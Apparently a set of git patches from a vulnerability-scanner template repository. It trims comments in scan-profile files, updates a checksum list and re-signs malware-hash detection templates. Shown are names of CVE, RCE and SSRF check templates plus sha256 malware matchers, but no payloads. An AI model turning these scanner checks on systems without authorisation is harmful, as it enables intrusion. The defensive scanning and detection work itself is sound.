CVE-2020-35713 -# - CVE-2020-26919 -# - CVE-2020-25223 -# - CVE-2020-24148 -# - CVE-2020-10770 -# - CVE-2019-9978 -# - CVE-2019-8451 -# - CVE-2019-3929 -# - CVE-2019-2767 -# - CVE-2019-2616 -# - CVE-2019-20224 -# - CVE-2019-19824 -# - CVE-2019-10758 -# - CVE-2018-16167 -# - CVE-2018-15517 -# - CVE-2018-1000600 -# - CVE-2017-9506 -# - CVE-2017-3506 -# - CVE-2017-18638 -# - CVE-2016-1555 -# - CVE-2015-8813 -# - CVE-2014-3206 -# - CVE-2009-4223 -# - CNVD-2021-09650 -# - generic-tokens -# - credentials-disclosure -# - targa-camera-ssrf -# - cloudflare-external-image-resize -# - linkerd-ssrf-detection -# - ssrf-via-oauth-misconfig -# - tls-sni-proxy -# - xmlrpc-pingback-ssrf -# - hashicorp-consul-rce -# - mirai-unknown-rce -# - optilink-ont1gew-gpon-rce -# - sar2html-rce -# - zimbra-preauth-ssrf -# - wp-xmlrpc-pingback-detection -# - fastjson-1-2-41-rce -# - fastjson-1-2-42-rce -# - fastjson-1-2-43-rce -# - fastjson-1-2-62-rce -# - fastjson-1-2-67-rce -# - fastjson-1-2-68-rce -# - request-based-interaction -# - open-proxy-internal -# - open-proxy-localhost -# - open-proxy-portscan -# # Running this profile # You can run this profile using the following command: # nuclei -profile recommended -u https://example.com diff --git a/profiles/subdomain-takeovers.yml b/profiles/subdomain-takeovers.yml index a70812bc23..eb835e0407 100644 --- a/profiles/subdomain-takeovers.yml +++ b/profiles/subdomain-takeovers.yml @@ -7,12 +7,6 @@ # Subdomain takeovers can occur when a DNS entry points to a deprovisioned or unclaimed cloud resource, potentially # allowing an attacker to claim the resource and hijack the subdomain. # -# Included Templates: -# This configuration references specific templates designed to detect subdomain takeover scenarios: -# - http/takeovers/: This directory contains general templates for detecting HTTP-based subdomain takeovers. -# - dns/azure-takeover-detection.yaml: This template specifically checks for subdomain takeovers on Microsoft Azure. -# - dns/elasticbeanstalk-takeover.yaml: This template specifically checks for subdomain takeovers on AWS Elastic Beanstalk. -# # Running this profile # You can run this profile using the following command : # nuclei -profile subdomain-takeovers -u https://www.example.com diff --git a/profiles/wordpress.yml b/profiles/wordpress.yml index fd22d449dd..dcdbcf0c4d 100644 --- a/profiles/wordpress.yml +++ b/profiles/wordpress.yml @@ -5,10 +5,6 @@ # Purpose: # This profile is focused on identifying security issues specific to WordPress, including vulnerable plugins, themes, and core components. Ensuring the security of WordPress installations is crucial due to its widespread use and common targeting by attackers. # -# Included Templates: -# This configuration references specific templates tagged with 'wordpress' to cover comprehensive WordPress scanning: -# - wordpress: Templates for detecting vulnerabilities and misconfigurations in WordPress installations, plugins, and themes. -# # Running this profile # You can run this profile using the following command: # nuclei -profile wordpress -u https://example.com From b4d2d3b51c6e28276d4e98332081215d8670bed2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 10:29:33 +0000 Subject: [PATCH 0610/1841] Auto Generated Templates Checksum [Tue Jun 25 10:29:33 UTC 2024] :robot: --- templates-checksum.txt | 74 +++++++++++++++++++++--------------------- 1 file changed, 37 insertions(+), 37 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7accba0c86..6aa2d5426a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -524,7 +524,7 @@ file/malware/hash/anthem-deeppanda-malware-hash.yaml:bb3642fcf6638c330f08d8dae54 file/malware/hash/applejeus-malware-hash.yaml:4865b8c3e03b53c144d9370b16a1befe92af894c file/malware/hash/avburner-malware-hash.yaml:27fc3e8dad2eb7a775ae263fa06a573a91c45e4f file/malware/hash/backwash-malware-hash.yaml:75e9529b4fa6c80619d2ab92063bc0b75bdb3aba -file/malware/hash/blackenergy-driver-amdide-hash.yaml:06705d8475df3472f50d63bf20cc95073923b3f5 +file/malware/hash/blackenergy-driver-amdide-hash.yaml:158b40f13084aa47257fe805b1ce701206c63dd0 file/malware/hash/blackenergy-driver-malware-hash.yaml:6b27b5f6419a81d81d495aaf0ea4055eb88d67e6 file/malware/hash/blackenergy-killdisk-malware-hash.yaml:417cb6add69482352064dedd30a62028527af0af file/malware/hash/blackenergy-ssh-malware-hash.yaml:bd8231fc3a0966f01ec85bcd3c70ccfd54bed031 @@ -558,20 +558,20 @@ file/malware/hash/ironpanda-malware-hash.yaml:a0a2d303efe23e2f7b77434f5e9b16a1a4 file/malware/hash/locky-ransomware-hash.yaml:5d567c1fcaf1703d2837c4a4af2e3bd889d8766d file/malware/hash/minidionis-readerview-malware-hash.yaml:1ac390045933b5157feb70eb37a93ceacf147136 file/malware/hash/minidionis-vbs-malware-hash.yaml:40aaafab8cc281de9906e658e879c89251d8b291 -file/malware/hash/naikon-apt-malware-hash.yaml:858e0f2954b8ce8f8a5eaf50d07a220a89ca009f +file/malware/hash/naikon-apt-malware-hash.yaml:e50a339b227bb5a6a738d39753adf5cca007a25b file/malware/hash/neuron2-malware-hash.yaml:d2626f562e3f7c7be40fdda0180affe41ea1b14b file/malware/hash/oilrig-malware-hash.yaml:002591392ad1acf55c3034218b36bb7b992a442f file/malware/hash/passcv-ntscan-malware-hash.yaml:faff7de8b889f5015b7cfaa428382850549fbb40 file/malware/hash/passcv-sabre-malware-hash.yaml:88556ab3408121a616af39d8fecbfe0447dd3777 file/malware/hash/passcv-signingcert-malware-hash.yaml:3da724d67f1832b5518c8b31054122e1f9aa9957 -file/malware/hash/petya-ransomware-hash.yaml:a03e15bcf761711cdab594649cfe13fa9605f90e +file/malware/hash/petya-ransomware-hash.yaml:06a5bd0fe7381407ae15c0d49db9605d75df14e4 file/malware/hash/poseidongroup-maldoc-malware-hash.yaml:466f570c989143ced35f2ab1e82b819ccb5e6887 file/malware/hash/poseidongroup-malware-hash.yaml:516f861330f2af629758648e3a7daf913ce2cce7 file/malware/hash/powerstar-malware-hash.yaml:b1dae0703f67f8c8d7b013687fb5a6b776192900 -file/malware/hash/purplewave-malware-hash.yaml:4fa053d77fbcc0590656ffac1f8223dce12a4420 +file/malware/hash/purplewave-malware-hash.yaml:d2a611217f3c875c068171f44b2af09fdbff3368 file/malware/hash/red-leaves-malware-hash.yaml:f8f0b24847246e20aa9bceefe02e2fad940a6e66 file/malware/hash/regeorg-webshell-hash.yaml:3b37f461bfcefbcb0c81d03fab96295456bf5f2a -file/malware/hash/revil-ransomware-hash.yaml:c79bfdbeea825f51a3c1e52768c48e02f197b5d5 +file/malware/hash/revil-ransomware-hash.yaml:5bb9bc2c27ee1825e48b3974a70ed7c0d39650dc file/malware/hash/rokrat-malware-hash.yaml:6aa086d47148b9abb0075fbe1f39eb24b552b18d file/malware/hash/sauron-malware-hash.yaml:ba6ad6e4659c5250b159a3513107e3b458d0cc7a file/malware/hash/seaduke-malware-hash.yaml:935de90d644686ad270d5ad8bd43a54916e213f9 @@ -1290,7 +1290,7 @@ http/cves/2015/CVE-2015-3337.yaml:5abe6c220d4892bc6f3f8839836a7696bc2a3c82 http/cves/2015/CVE-2015-3648.yaml:33e6aa6bb2981bbe6e7798ce23c59f911ab22255 http/cves/2015/CVE-2015-3897.yaml:2c99a2568eb635f5e58cd4803bb50ec3482c4d62 http/cves/2015/CVE-2015-4050.yaml:902a93dcdb63a21b6683515c0e1ddf513ce5ddc4 -http/cves/2015/CVE-2015-4062.yaml:2fc66be404564d3489d99706c4da6dfc007a6a07 +http/cves/2015/CVE-2015-4062.yaml:d4a83654180bb324c4ac0b909c3ab3226d404bb1 http/cves/2015/CVE-2015-4063.yaml:73fd1011f479ba835d4e1df949c173e05e3fa187 http/cves/2015/CVE-2015-4074.yaml:3c847a80227020cd12b9d58def71f335ed1ef5d1 http/cves/2015/CVE-2015-4127.yaml:8e3cc35845ff4b07a83527875682fa9fb1c1c226 @@ -2386,7 +2386,7 @@ http/cves/2021/CVE-2021-39141.yaml:658ae606eefaee8e5ed50c513aff80caa008aa2f http/cves/2021/CVE-2021-39144.yaml:df10799e1ee8eb495557350715a2105e62845151 http/cves/2021/CVE-2021-39146.yaml:6ced53b90254c74c5a35b67d00c776c1aae0e1d3 http/cves/2021/CVE-2021-39152.yaml:ccbd9449525555e79a34a562ceee2264622470dd -http/cves/2021/CVE-2021-39165.yaml:302a847b6adcb420f513120028dde316cf5bb479 +http/cves/2021/CVE-2021-39165.yaml:6419221bc8e9061109110a33579381c4108f53a9 http/cves/2021/CVE-2021-39211.yaml:4d7f0b468d404e83a4f7317b87ba0e1b0b79265f http/cves/2021/CVE-2021-39226.yaml:d59d4b479bf607b76bc705a325473543be39d0cc http/cves/2021/CVE-2021-39312.yaml:eea2b37fd676c4075a9b388b8f27a51308c86f2e @@ -2646,7 +2646,7 @@ http/cves/2022/CVE-2022-2219.yaml:f682b76185ee7e4b14c791de3f406e1200a1873e http/cves/2022/CVE-2022-22242.yaml:5ba8e944ff85f24ce27e54f2ed971fe77d29c0ed http/cves/2022/CVE-2022-22536.yaml:c9a773a1cb114cbc0732fc3d816ceb77f4ef383e http/cves/2022/CVE-2022-22733.yaml:5ec717eb729ca3bfb9bf3dc1ad1e60d1ae6ffba6 -http/cves/2022/CVE-2022-22897.yaml:85a206aa8c2c6ab8b518ee87bf94100865e11090 +http/cves/2022/CVE-2022-22897.yaml:8b9f358d7287cc3e9fd44c125d3a2f050d85dfab http/cves/2022/CVE-2022-2290.yaml:969dc774e02e9796b5c5c058809b241124b640a3 http/cves/2022/CVE-2022-22947.yaml:8c8ebad1b68f62dc0b84b4265274461ac3403869 http/cves/2022/CVE-2022-22954.yaml:e7fb1f8aa8ef4dbe1fa04588b921bbbc4ad4c281 @@ -2883,7 +2883,7 @@ http/cves/2022/CVE-2022-40047.yaml:2931bef5361cf87ba2274ccc6090dde8328e2440 http/cves/2022/CVE-2022-40083.yaml:333acecbc6c71ec844ded8fbdc5e2de95af9e34e http/cves/2022/CVE-2022-40127.yaml:1c30549f833d342dd280fd26686b3181fb9af4f1 http/cves/2022/CVE-2022-40359.yaml:ddd501f8d916d909938c17ccf6492dc2e2c7d812 -http/cves/2022/CVE-2022-4049.yaml:8b7841be211e03d9e978d650806c532268df4680 +http/cves/2022/CVE-2022-4049.yaml:d7c394adacea8c5bf098022a9d2d86aca9fc5caf http/cves/2022/CVE-2022-4050.yaml:054b17311703abba376a3fceb0279ec9e86bbb01 http/cves/2022/CVE-2022-4057.yaml:f9ed01b5d367fe19da6614416acba1eb86ff9fff http/cves/2022/CVE-2022-4059.yaml:1770b6465e74d136837d297e5e2702bd1798dd4d @@ -2989,7 +2989,7 @@ http/cves/2023/CVE-2023-0562.yaml:86e35de0ffd83e90947e7c4b0b49836230bde3bc http/cves/2023/CVE-2023-0563.yaml:5826a789671414b74d945727d46e2868a0030eb9 http/cves/2023/CVE-2023-0600.yaml:fcfb1a40a3cd2e7df90c774102fd125bd335b405 http/cves/2023/CVE-2023-0602.yaml:e31c5d2abf85c2ee480612417a8d6a784ea0c190 -http/cves/2023/CVE-2023-0630.yaml:21ffb9436503bd54caae3db66aacabad37e9c8fe +http/cves/2023/CVE-2023-0630.yaml:835b6359ffe1bd3f526ad9ae4b34e0d41c12852a http/cves/2023/CVE-2023-0669.yaml:8b9956b2b579a7e3030f18be3f3d24569cb6733c http/cves/2023/CVE-2023-0678.yaml:425a6993c9f4095a50e255ef189c02c5cbc6c9c2 http/cves/2023/CVE-2023-0777.yaml:5f28117981d93630dd24ebef0d1505b0237eb797 @@ -3104,7 +3104,7 @@ http/cves/2023/CVE-2023-2822.yaml:832b20338fa90959828ef3e67d5e817cd557a8aa http/cves/2023/CVE-2023-2825.yaml:92feef41f6a25642c5215adcb38592b71c0462c9 http/cves/2023/CVE-2023-28343.yaml:0252ea544fae8e4c4601f1ec39ab3d55115cba0f http/cves/2023/CVE-2023-28432.yaml:55e5c982b19f567942ceb8ab4ac57446750405c9 -http/cves/2023/CVE-2023-28662.yaml:ecfe56fcccb4b7dce34fe8977ae248ec0bbce103 +http/cves/2023/CVE-2023-28662.yaml:db8a8150ddf3eeb5658b6a1f890fbda8f0904d59 http/cves/2023/CVE-2023-28665.yaml:c7ea34160278c858993ca4e151493a66c041e685 http/cves/2023/CVE-2023-29084.yaml:7335430074b2cdc90b92637fcf2145c3a2cdbb5a http/cves/2023/CVE-2023-29298.yaml:fc59b893b6d31feebb375289accdccc041d75ac9 @@ -3123,7 +3123,7 @@ http/cves/2023/CVE-2023-29922.yaml:f0da9a62d02badbf7ac6b2ba807c94a38d666388 http/cves/2023/CVE-2023-29923.yaml:cc106f6716a44a5aeca4a0abedc26408543c85b6 http/cves/2023/CVE-2023-30013.yaml:a7e4c7bc35c13f4d515cd586604b091640fe0594 http/cves/2023/CVE-2023-30019.yaml:717d5bc6c8b2c31bfc2edd5c68bf2052492faaa8 -http/cves/2023/CVE-2023-30150.yaml:ab8934d841747f2ee5667726c6bfee382fc12e97 +http/cves/2023/CVE-2023-30150.yaml:beb3b5a0ffb2d4697c4e2f0ecb2a1e883dd86f95 http/cves/2023/CVE-2023-30210.yaml:5813ad5f81384f32da9b1376920592d190809922 http/cves/2023/CVE-2023-30212.yaml:e78558d9584338de17429906728f353dca4265ac http/cves/2023/CVE-2023-30256.yaml:21511c5e34cd98222ff485ca650f32c54ea3464d @@ -3237,7 +3237,7 @@ http/cves/2023/CVE-2023-39600.yaml:7bc52c9f178223c128a174a171353c694429c88e http/cves/2023/CVE-2023-39676.yaml:85436c487f3535f724b8b552987b8564b715a2a4 http/cves/2023/CVE-2023-39677.yaml:379d594ca8bbfea196d292c1856da7eae11b3332 http/cves/2023/CVE-2023-39700.yaml:abd644de09232548601e5d2d693d4c054e1b42a0 -http/cves/2023/CVE-2023-39796.yaml:c5056df9e62c54ba2de50de5a57cf54675abd330 +http/cves/2023/CVE-2023-39796.yaml:720375efff19cad0ac4c72ade3accbcf6824e2be http/cves/2023/CVE-2023-40208.yaml:3bd72bed6969fb8149de3c31b7909d9c88799d1f http/cves/2023/CVE-2023-40355.yaml:7761faee9b0236c926e300d32db3a9508227204d http/cves/2023/CVE-2023-40779.yaml:44138c89024a59d0b0105341177b8d5718ce132f @@ -3270,7 +3270,7 @@ http/cves/2023/CVE-2023-43208.yaml:462628870cee32dc0dccd7ed2d329f54ac90d917 http/cves/2023/CVE-2023-43261.yaml:4c534b1a5dd5916c25664920de4051ffa1310bf1 http/cves/2023/CVE-2023-43325.yaml:cad3358ef79bdf761c1bbb77c839e9af325f506f http/cves/2023/CVE-2023-43326.yaml:f117aa600d3815d4394d93563495b9a183a6b76d -http/cves/2023/CVE-2023-43374.yaml:c215725a1463355ef54975d0655b2e9872dc7929 +http/cves/2023/CVE-2023-43374.yaml:e776da19a0b00d4c913d7c1b0beab3657841b351 http/cves/2023/CVE-2023-43472.yaml:02352f22f7347c7ca98b3eb51d6851fcba2f0b40 http/cves/2023/CVE-2023-43795.yaml:36d3e9de4b3f54d3976afca31c54f6bf5f288b53 http/cves/2023/CVE-2023-4415.yaml:17cc5b909d851380cf62dcece5db812a7e1ea68a @@ -3339,13 +3339,13 @@ http/cves/2023/CVE-2023-6038.yaml:d0598518a34e87b3df39a996dbc2969ae576fad0 http/cves/2023/CVE-2023-6063.yaml:d1e516058338f612347dba91ed13fc5406cb4d7f http/cves/2023/CVE-2023-6065.yaml:9d402d2854231906a58b7fa10219cd189c5c6918 http/cves/2023/CVE-2023-6114.yaml:65353fb14406628586fb741a32c1bf7ec36c46e2 -http/cves/2023/CVE-2023-6360.yaml:f6225e8801b4dd10b60548d70b885b15b119820c +http/cves/2023/CVE-2023-6360.yaml:9b52dfd88a2b8324d4beda813c83bfbc1336c218 http/cves/2023/CVE-2023-6379.yaml:9f2ebeef8f2c8d3a3fb9c0e8b49cc3c0c132082d http/cves/2023/CVE-2023-6380.yaml:f4d215b24e29caa45bee7186a98523bad5c7e231 http/cves/2023/CVE-2023-6389.yaml:1442104ed12f70cbab2bdea5effa6e4262a9b95f http/cves/2023/CVE-2023-6505.yaml:84f672dbc2f01d602f46205dd57f62f15dc0e8ed http/cves/2023/CVE-2023-6553.yaml:7a54271ce0dabed297718787b829f3ddc52b256c -http/cves/2023/CVE-2023-6567.yaml:086b5b4e0069279aa73a98c4d6b736d2b3431cfd +http/cves/2023/CVE-2023-6567.yaml:0a7fedde7ec2ac7ec9fc65018c7dd3359d9f0fa7 http/cves/2023/CVE-2023-6623.yaml:00d70a24f04c9124d433cb202bbe6d5feac8db68 http/cves/2023/CVE-2023-6634.yaml:7d6b2f13c31512686f5c947bca522a303557ab7b http/cves/2023/CVE-2023-6786.yaml:6cb37423babfd031e76f3b1d59b8f231c968f2af @@ -3368,7 +3368,7 @@ http/cves/2024/CVE-2024-0713.yaml:b8ebbe918246b345ca0ec9041ff7b1edea36dda0 http/cves/2024/CVE-2024-0881.yaml:a827b28c2e217c38e6a44902abf23f5df53bb437 http/cves/2024/CVE-2024-0939.yaml:04b5c41f49b6511cf5cf1af97d3d2d1193532833 http/cves/2024/CVE-2024-1021.yaml:c9be400622968f5464c3aed476c4719ddef81b52 -http/cves/2024/CVE-2024-1061.yaml:4aeb219e32007f374bc7304f5b33f28a575bc007 +http/cves/2024/CVE-2024-1061.yaml:0851b63bf9a1294ca0f9977c726decf1f4cde1c1 http/cves/2024/CVE-2024-1071.yaml:c96b9ae1af3c57ad1d76138972e4ef609468f43c http/cves/2024/CVE-2024-1183.yaml:ffe0544f2ff472a9588380611602503fcd73e340 http/cves/2024/CVE-2024-1208.yaml:080cd48093b2902e76b14bdeddd38bbba9bc18a9 @@ -7941,7 +7941,7 @@ http/vulnerabilities/other/empirecms-xss.yaml:1dd42b3c178c08112a55a795637916ae0a http/vulnerabilities/other/ems-sqli.yaml:5041a04bd1dddfaa7461e369509b318dda871c4d http/vulnerabilities/other/ep-web-cms-xss.yaml:9b9f26659fe3486aeb093bff5874b1f9900df616 http/vulnerabilities/other/epp-server-lfi.yaml:73d70e01fa3888f4152dddbf72025699ec7a7cda -http/vulnerabilities/other/erensoft-sqli.yaml:29002dbb52deaf441e9ecb2f14a0ed1414a73278 +http/vulnerabilities/other/erensoft-sqli.yaml:2db8e70b395c704b4ba339d911330f5fd8d5ae23 http/vulnerabilities/other/eris-xss.yaml:4577a38a1df827d27fa7897de54fb081dd48d9d8 http/vulnerabilities/other/etouch-v2-sqli.yaml:0db1cf3824fbb4f52c61900f9dfa14810cbc2919 http/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml:aa21740a09946f8468031c7af22571eeabf045e3 @@ -8203,7 +8203,7 @@ http/vulnerabilities/other/zzcms-xss.yaml:16bcfdc7025566b60cd5440ea331d5395dd41c http/vulnerabilities/php/php-xdebug-rce.yaml:b50c0de8f5f6590bae1f200c2b6624f69e03e8ce http/vulnerabilities/phpmyadmin-unauth.yaml:d15ef415782dbc76f48b70d10f1520819b28c7e8 http/vulnerabilities/portainer-init-deploy.yaml:93713c9e50dea4da7a387e9be325229a914eb433 -http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml:8ac2b34f7a77e3ee8f5d3e5e4ea4b32017033fd3 +http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml:f99a2b44a0c108beafe7d07124f51eae1780532f http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml:f312a1b2cfdd69d925a4615ab8773c60121c49af http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml:5eb3b6305e550c1b5e589d7b8c2f64337cd25190 http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml:b4125e258896dd6b614f98e0443fdba778b4ca1a @@ -8282,7 +8282,7 @@ http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml:9061b5a5e6523f698d8 http/vulnerabilities/ueditor/ueditor-ssrf.yaml:6d255515d772049bbc3acf2eda7a486357d23ee7 http/vulnerabilities/ueditor/ueditor-xss.yaml:222e1f2da270e70eb6a8c9a9b57ba955b9ecb785 http/vulnerabilities/vbulletin/arcade-php-sqli.yaml:3aefc2073f08e855dec0c8146b728b692ce654f2 -http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml:7e581989b879ce1f3c9ddf609b85ddff43ae4f16 +http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml:5872cfdb1bcb847a56b5ccb0a741f80781b8609e http/vulnerabilities/vbulletin/vbulletin-backdoor.yaml:5565f8dcc7d5ad169422fd7e698c0399f79ab961 http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml:286dda2cca7b4e62e4c1a76eed1c5dfcf7d6495d http/vulnerabilities/videoxpert-lfi.yaml:1aa4c4a1048489e9343348c0e436a2917c4edcf9 @@ -8442,7 +8442,7 @@ http/vulnerabilities/wordpress/wp-all-export-xss.yaml:835dab6e7769a010535ff599f8 http/vulnerabilities/wordpress/wp-altair-listing.yaml:8b4bcd2bb94c42e26f654308a73865b836402b96 http/vulnerabilities/wordpress/wp-ambience-xss.yaml:5b23993a7619230252ea0f5addb6398b4166e2c1 http/vulnerabilities/wordpress/wp-arforms-listing.yaml:1d6ff4f881b4fe560e40f931659518449cec25d6 -http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml:569569c9fd2f082b0398450fbc5424c79b5c7446 +http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml:d00637e733223680b3b5e205f70800a97acb7757 http/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml:caf5f60512f9b2d1d1881ab49f20cf0ceed1890a http/vulnerabilities/wordpress/wp-code-snippets-xss.yaml:d3ed04f7ea1318cc872d77ee4fe3aad813041b0a http/vulnerabilities/wordpress/wp-config-setup.yaml:d5a639e548f566b597f91aa5fa36bef2f836b8a6 @@ -8493,7 +8493,7 @@ http/vulnerabilities/wordpress/wp-smart-manager-sqli.yaml:6c308e55d5505e420ea6b1 http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml:0ba95fd6c7ab7739be4858037e18fc8abbf16d97 http/vulnerabilities/wordpress/wp-socialfit-xss.yaml:daf38a1b0feff473061c164faf94222d82e622aa http/vulnerabilities/wordpress/wp-spot-premium-lfi.yaml:1ba6d305a15be605674cbbc799bd7e9160823a87 -http/vulnerabilities/wordpress/wp-statistics-sqli.yaml:629d5b29ea40a1f03991826003b7aeb88c2e9896 +http/vulnerabilities/wordpress/wp-statistics-sqli.yaml:3b2459bb3bfe63617d34a2175b79dfc8498144ae http/vulnerabilities/wordpress/wp-super-forms.yaml:e828dbd896c649b82e4c7b47c312a852d3024309 http/vulnerabilities/wordpress/wp-superstorefinder-misconfig.yaml:73d5fc4e0f5d94a04d92fe7239531cd63e8912d8 http/vulnerabilities/wordpress/wp-sym404.yaml:3f6e3c01091b8b7a2520eb2d950759a682caa998 @@ -8540,7 +8540,7 @@ http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml:2d4415456f2647e6 http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml:1dc3dc257a37960cfc7f288764e3299a99097e0e http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml:e9e201ac2d626d5305fc854a70b1c11166afd2fb http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml:ad806552bd9cebde1708802b2e820cca481f63e4 -http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml:70a166c29d52685a7f46607aaf07e18f4cb9a24f +http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml:0930098b37e392d1cf4cdb778b74bba6a2376e3e http/vulnerabilities/yonyou/yonyou-ufida-nc-lfi.yaml:570802cd60aeaa735352489d41f6ef86bc61fc77 http/vulnerabilities/zend/zend-v1-xss.yaml:05b01c979af3184012ae4a0a8ecfc917eb55b6c7 http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml:aeb3591b7d975001b6ac134aafc0a5638821b1b7 @@ -8745,21 +8745,21 @@ network/misconfig/unauth-psql.yaml:321787e18e6164df765b26b771bd22606f3cd55d network/vulnerabilities/clockwatch-enterprise-rce.yaml:1174218309884e2cc7b11eb461395217c3cf1e95 passive/cves/2024/CVE-2024-25723.yaml:7eb36ba743582e6c04a324131d789035b7e6d72c profiles/README.md:84e7479141844434737d87eea1ab678c04d11c33 -profiles/all.yml:ad3168415c8c0feaf46c6425a78546b98c3db879 -profiles/aws-cloud-config.yml:5c794783b4dd14d07c64df29da4d9d4981af49e4 -profiles/cloud.yml:3133844636ed8272a455c69b86bb7b6bc6f02af7 -profiles/compliance.yml:2a4e9c29796e498b4a9129572bd57f8652fe2c0c -profiles/cves.yml:2c2976ffcead9f014a5933dd6718f4e7ef4a74c2 -profiles/default-login.yml:f10a424c61d9a1d411229bc2e35f2bdb2650bedf +profiles/all.yml:29a13b0b8f2933e1af3fefddd2d0761b439dc01f +profiles/aws-cloud-config.yml:62e4b0c8d93906ff00ab4785b5725f8799101f68 +profiles/cloud.yml:d5e12a8698ab06d5be7709790f9b20058f946fe1 +profiles/compliance.yml:ee71a4ec64e75aba3fc3ba0a5a5b1669ef00c7c7 +profiles/cves.yml:22b1f2b4937c4c9b7691d70b155ffd670bdbaa53 +profiles/default-login.yml:8854da6346c62c731585a3e0fc0d3c01a80d7f9b profiles/k8s-cluster-security.yml:b35ea16f23e68b75575f1ab3d02c655cebdc46ee -profiles/kev.yml:f4fadde36adee86e24778fd0bd00fbcb49a30a4b -profiles/misconfigurations.yml:586c1e221434a7afe5295c6e45473cab80632b2d -profiles/osint.yml:e2c01c742d5d7bf7ac3599a7c29afdb5dd1c6d90 -profiles/pentest.yml:01b7a6a5772a05c0ff3ec78c096dfa4ddc14579e +profiles/kev.yml:869fa2edacadbbf909255e47e89ccc83846410ba +profiles/misconfigurations.yml:bcf52964558df0c408cd635f574ebefb986600e9 +profiles/osint.yml:9061ab6fab15400051c99d610dfd74988b430c8c +profiles/pentest.yml:ca6cc6abe413d9906ee7f27f5dd26c20ae570f43 profiles/privilege-escalation.yml:49544205561ba8a6e7754e3cc92d34f82d69be61 -profiles/recommended.yml:1bca45c493a386d8683b5681baa8fdb10bed19c1 -profiles/subdomain-takeovers.yml:71a2e501c22e3032df9efa362c8062716b725831 -profiles/wordpress.yml:1ba00c9d00e50671e20f22bd6ec414246af67d06 +profiles/recommended.yml:1371c34dc9567fd91e898a944765e75945211497 +profiles/subdomain-takeovers.yml:a569b5a77197d99bf88ab2b230df1a9090519264 +profiles/wordpress.yml:0d1b08e4236903fb3ed31cd93b64806dc9363483 ssl/c2/asyncrat-c2.yaml:6c9515a71fd5ffb28accde9bf1b379fdd366a2fa ssl/c2/bitrat-c2.yaml:bf09d13d92fcc31677491ae6aab2b73c833cff91 ssl/c2/cobalt-strike-c2.yaml:1d214f56c77fc9fa78872632dc27991220794521 @@ -8789,7 +8789,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:1135302d10cf3e433920565e86b73e2aab33b758 +templates-checksum.txt:3c7701d565ced152c0518c8c47ee771b1eb2e9ac wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 977aff752cba34ab5eb680cf7db96e0524d7e054 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 10:31:23 +0000 Subject: [PATCH 0611/1841] Auto Template Signing [Tue Jun 25 10:31:23 UTC 2024] :robot: --- file/malware/hash/blackenergy-driver-amdide-hash.yaml | 2 +- file/malware/hash/naikon-apt-malware-hash.yaml | 2 +- file/malware/hash/petya-ransomware-hash.yaml | 2 +- file/malware/hash/purplewave-malware-hash.yaml | 2 +- file/malware/hash/revil-ransomware-hash.yaml | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/file/malware/hash/blackenergy-driver-amdide-hash.yaml b/file/malware/hash/blackenergy-driver-amdide-hash.yaml index d97717f7c3..642ecf6e50 100644 --- a/file/malware/hash/blackenergy-driver-amdide-hash.yaml +++ b/file/malware/hash/blackenergy-driver-amdide-hash.yaml @@ -24,4 +24,4 @@ file: - "sha256(raw) == 'cbc4b0aaa30b967a6e29df452c5d7c2a16577cede54d6d705ca1f095bd6d4988'" - "sha256(raw) == '1ce0dfe1a6663756a32c69f7494ad082d293d32fe656d7908fb445283ab5fa68'" condition: or -# digest: 4b0a0048304602210092a22727336f846116818542136787558ac60bac32434cb43e885f8219611b1e022100efe63d7b61f6b6ead92326259bce806df50567cb9862d210c84b4bbadae50bb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009e755cb9b884c78a81ebf3c11bdecc13822a87e81b7f2aadb0386c4b3d0505f3022100c44721811a65d9293b7a5cec15ad9a83ba3180b5c373c7b508cf35c6679994e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/file/malware/hash/naikon-apt-malware-hash.yaml b/file/malware/hash/naikon-apt-malware-hash.yaml index dc1a050adc..361eb15edf 100644 --- a/file/malware/hash/naikon-apt-malware-hash.yaml +++ b/file/malware/hash/naikon-apt-malware-hash.yaml @@ -17,4 +17,4 @@ file: - "sha256(raw) == 'd5716c80cba8554eb79eecfb4aa3d99faf0435a1833ec5ef51f528146c758eba'" - "sha256(raw) == 'f5ab8e49c0778fa208baad660fe4fa40fc8a114f5f71614afbd6dcc09625cb96'" condition: or -# digest: 